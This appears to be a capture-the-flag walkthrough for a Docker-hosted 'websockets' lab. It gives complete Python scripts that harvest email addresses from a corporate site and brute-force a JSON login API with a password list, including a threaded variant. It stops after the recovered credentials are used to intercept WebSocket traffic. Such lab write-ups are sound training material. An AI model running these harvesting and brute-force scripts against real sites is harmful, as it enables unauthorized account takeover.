
Would you like to run this challenge’s Docker container locally?
docker run -d -p 5055:3000 --name websockets --restart always joshbeck2024/ctf_websockets_challenge
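If you do spin it up locally, a quick probe confirms the app is answering on the mapped port. A minimal sketch; localhost:5055 comes from the -p flag above, and the index.html path mirrors the target site:

import requests

# The -p 5055:3000 mapping publishes the app on localhost:5055.
response = requests.get("http://localhost:5055/index.html", timeout=5)
print(response.status_code)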
For this challenge, we have a corporate website with email addresses scattered throughout it.

Here’s a script that extracts all email addresses from this series of webpages.
# Import the requests library to make HTTP requests (download web pages)
import requests
# Import re for regular expressions (used to find email patterns in text)
import re
# Import BeautifulSoup for parsing and navigating HTML content
from bs4 import BeautifulSoup
# Import urljoin to safely build full URLs from relative links
from urllib.parse import urljoin

def extract_emails(text):
    """
    This function takes a block of text and extracts any email addresses
    found inside it using a regular expression.
    """
    # Regular expression pattern that matches most email addresses
    email_pattern = r'[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}'
    # re.findall() returns all matches found in the text
    # set() removes duplicate email addresses
    return set(re.findall(email_pattern, text))

def scrape_emails():
    """
    This function visits a website, extracts emails from the main page,
    then follows links on that page and extracts emails from those pages too.
    """
    # The starting page we want to scrape
    base_url = "http://sem2ctf.icsi.cyber:5055/index.html"
    # Keep track of URLs we have already visited to avoid repeats
    visited_urls = set()
    # Store all discovered email addresses (unique values only)
    found_emails = set()
    # Create a session object for efficiency (reuses connections)
    session = requests.Session()

    print(f"I: Visiting main page: {base_url}")
    try:
        # Request the main page
        response = session.get(base_url, timeout=5)
        # Raise an exception if the request failed (404, 500, etc.)
        response.raise_for_status()
        # Parse the HTML content using BeautifulSoup
        soup = BeautifulSoup(response.text, 'html.parser')
        # Extract emails from all visible text on the main page
        found_emails.update(extract_emails(soup.get_text()))

        # List to store links found on the page
        links = []
        # Find all anchor (<a>) tags that contain an href attribute
        for a_tag in soup.find_all('a', href=True):
            href = a_tag['href']
            # Convert relative URLs into full absolute URLs
            full_url = urljoin(base_url, href)
            # Only follow valid HTTP links and avoid duplicates
            # This also skips things like mailto: or javascript: links
            if full_url.startswith('http') and full_url not in visited_urls:
                links.append(full_url)
                visited_urls.add(full_url)

        # Visit each discovered link once (one level deep)
        for link in links:
            # Avoid re-visiting the main page
            if link == base_url:
                continue
            print(f"I: Visiting link: {link}")
            try:
                # Request the linked page
                link_response = session.get(link, timeout=5)
                # Only process the page if the request was successful
                if link_response.status_code == 200:
                    link_soup = BeautifulSoup(link_response.text, 'html.parser')
                    # Extract emails from this page's text
                    found_emails.update(extract_emails(link_soup.get_text()))
            except Exception as e:
                # If a link fails (404, timeout, etc.), continue safely
                print(f"E: Failed to visit {link}: {e}")
    except Exception as e:
        # If the main page fails, stop the program
        print(f"C: Critical error accessing main page: {e}")
        return

    # Write all found email addresses to a file
    with open('email.txt', 'w') as f:
        for email in sorted(found_emails):
            f.write(email + '\n')
    print(f"S: Scraped {len(found_emails)} unique emails. Saved to email.txt")

# This ensures the script only runs when executed directly,
# not when imported as a module
if __name__ == "__main__":
    scrape_emails()
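Before pointing the scraper at the target, it’s worth sanity-checking the regex on a throwaway string (the addresses below are made up for illustration):

import re

email_pattern = r'[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}'
sample = "Contact alice@socketcorp.local or bob.smith@example.com for access."
# Prints both addresses as a set, e.g. {'alice@socketcorp.local', 'bob.smith@example.com'}
print(set(re.findall(email_pattern, sample)))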
A password list is provided on the front page to speed things up; save it as pass.txt. rockyou.txt will also work here, but it’s going to take a while!
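If you’d rather not click through manually, here is a minimal sketch for grabbing the provided wordlist. It assumes the front page links it as a .txt file (check the actual link in your browser); pass.txt is simply the filename the brute-force script below expects:

import requests
from bs4 import BeautifulSoup
from urllib.parse import urljoin

base_url = "http://sem2ctf.icsi.cyber:5055/index.html"
soup = BeautifulSoup(requests.get(base_url, timeout=5).text, 'html.parser')
for a_tag in soup.find_all('a', href=True):
    # Assumes the wordlist is the first .txt link on the page
    if a_tag['href'].endswith('.txt'):
        wordlist_url = urljoin(base_url, a_tag['href'])
        print(f"I: Downloading {wordlist_url}")
        with open('pass.txt', 'wb') as f:
            f.write(requests.get(wordlist_url, timeout=5).content)
        break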

If we intercept a single manual login attempt using Burp Suite, we’ll see a POST to /api/login carrying the username and password in a JSON body:


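To reproduce that request outside the proxy, a single probe looks like this (a minimal sketch; the endpoint and JSON field names mirror the intercepted request, and the credentials are placeholders):

import requests

# Placeholder credentials; the goal is just to see what a failed
# login's status code and response body look like before automating.
response = requests.post(
    "http://sem2ctf.icsi.cyber:5055/api/login",
    json={'username': 'test@socketcorp.local', 'password': 'test'},
    timeout=5,
)
print(response.status_code)
print(response.text)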
Because we now have our email.txt and pass.txt files, we can put together a textbook brute force:
# Import requests to send HTTP requests (used to talk to the API)
import requests

def brute_force():
    """
    This function attempts to brute-force login credentials against
    a web API by trying combinations of usernames and passwords.
    """
    # The API endpoint we are attacking
    target_url = "http://sem2ctf.icsi.cyber:5055/api/login"

    # Load usernames (emails) from email.txt
    try:
        with open('email.txt', 'r') as f:
            # Read each line, remove whitespace, and ignore empty lines
            usernames = [line.strip() for line in f if line.strip()]
    except FileNotFoundError:
        # Stop if the file does not exist
        print("E: email.txt not found.")
        return

    # Load passwords from pass.txt
    try:
        with open('pass.txt', 'r') as f:
            # Read each line, remove whitespace, and ignore empty lines
            passwords = [line.strip() for line in f if line.strip()]
    except FileNotFoundError:
        # Stop if the file does not exist
        print("E: pass.txt not found.")
        return

    # Print basic info so the user knows what is happening
    print(f"I: Loaded {len(usernames)} usernames and {len(passwords)} passwords.")
    print(f"I: Target URL: {target_url}")

    # Create a session object to reuse the same connection (more efficient)
    session = requests.Session()

    # Loop through every username
    for username in usernames:
        # Loop through every password
        for password in passwords:
            # Optional debug output (commented out to reduce noise)
            # print(f"Trying {username}:{password}...", end='\r')

            # Build the JSON payload sent to the API
            json_data = {
                'username': username,
                'password': password
            }
            try:
                # Send a POST request with JSON data
                response = session.post(
                    target_url,
                    json=json_data,
                    timeout=5
                )
                # Check for possible success
                # Many APIs return HTTP 200 on successful login
                if response.status_code == 200:
                    try:
                        # Try to parse the response as JSON
                        resp_json = response.json()
                        # Look for common success indicators
                        # - success flag
                        # - token value
                        # - the word "success" in the response
                        if (
                            resp_json.get('success') or
                            resp_json.get('token') or
                            'success' in response.text.lower()
                        ):
                            print(f"\n[+] SUCCESS Found credentials: {username}:{password}")
                            print(f"Response: {response.text}")
                            return
                    except ValueError:
                        # If the response is not valid JSON,
                        # we fall back to checking the raw text
                        pass
                    # Fallback check in case JSON parsing failed
                    if "success" in response.text.lower():
                        print(f"\n[+] SUCCESS Found credentials: {username}:{password}")
                        return
            except requests.RequestException as e:
                # If the request fails (timeout, connection error, etc.),
                # skip this attempt and continue
                # print(f"\nE: Request failed for {username}:{password} - {e}")
                continue

    # If all combinations are tried with no success
    print("\n[-] Finished brute force. No credentials found.")

# This ensures the function only runs if the script is executed directly
if __name__ == "__main__":
    brute_force()
This will kick out john@socketcorp.local’s credentials.

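As noted earlier, a big list like rockyou.txt makes the sequential loop crawl. One common speed-up is fanning the attempts out over a thread pool; here is a minimal sketch of the idea for modestly sized lists (it assumes the server tolerates concurrent logins and reuses the same success check as above):

import requests
from concurrent.futures import ThreadPoolExecutor, as_completed

def try_login(username, password):
    """Return the credential pair on a successful login, else None."""
    try:
        response = requests.post(
            "http://sem2ctf.icsi.cyber:5055/api/login",
            json={'username': username, 'password': password},
            timeout=5,
        )
        if response.status_code == 200 and 'success' in response.text.lower():
            return username, password
    except requests.RequestException:
        pass
    return None

def threaded_brute_force(usernames, passwords, workers=10):
    with ThreadPoolExecutor(max_workers=workers) as pool:
        futures = [pool.submit(try_login, u, p)
                   for u in usernames for p in passwords]
        for future in as_completed(futures):
            result = future.result()
            if result:
                # Cancel anything still queued once we have a hit (Python 3.9+)
                pool.shutdown(wait=False, cancel_futures=True)
                print(f"[+] SUCCESS Found credentials: {result[0]}:{result[1]}")
                return result
    print("[-] No credentials found.")
    return None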
Now let’s intercept a login using these credentials in Burp Suite.
- You’ll find three WebSocket communications this time.
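To poke at those frames outside the browser, the websocket-client package works well. A minimal sketch; the ws:// path below is a guess (hypothetical /ws endpoint), so substitute whatever Burp’s WebSockets history actually shows:

# Requires: pip install websocket-client
from websocket import create_connection

# Hypothetical endpoint; replace with the path from Burp's WebSockets history.
ws = create_connection("ws://sem2ctf.icsi.cyber:5055/ws", timeout=5)
try:
    # Read the first frame the server sends (times out if it waits on us).
    print("I: Received:", ws.recv())
finally:
    ws.close()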
